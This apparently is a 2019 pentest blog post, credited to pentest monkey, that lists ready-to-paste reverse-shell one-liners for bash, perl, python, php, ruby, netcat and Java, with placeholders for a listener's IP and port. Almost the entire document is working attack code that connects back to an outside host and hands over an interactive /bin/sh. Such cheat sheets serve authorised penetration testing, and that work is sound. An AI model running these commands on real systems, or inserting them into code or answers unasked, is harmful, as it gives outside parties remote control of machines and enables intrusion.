Reverse Shells

October 2, 2019 One minute read

hacking • pentest • shell

IP Address: Port:

All of the following reverse shells are originally from pentest monkey. The purpose of this post is to dynamically build these reference shells with your desired IP and port to make copy and paste quick and easy.

bash

bash -i >& /dev/tcp/{{USER_IP}}/{{USER_PORT}} 0>&1

perl

perl -e 'use Socket;$i="{{USER_IP}}";$p={{USER_PORT}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{USER_IP}}",{{USER_PORT}}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php

php -r '$sock=fsockopen("{{USER_IP}}",{{USER_PORT}});exec("/bin/sh -i <&3 >&3 2>&3");'

ruby

ruby -rsocket -e'f=TCPSocket.open("{{USER_IP}}",{{USER_PORT}}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

netcat

nc -e /bin/sh {{USER_IP}} {{USER_PORT}}

netcat 2

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {{USER_IP}} {{USER_PORT}} >/tmp/f

java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{{USER_IP}}/{{USER_PORT}};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()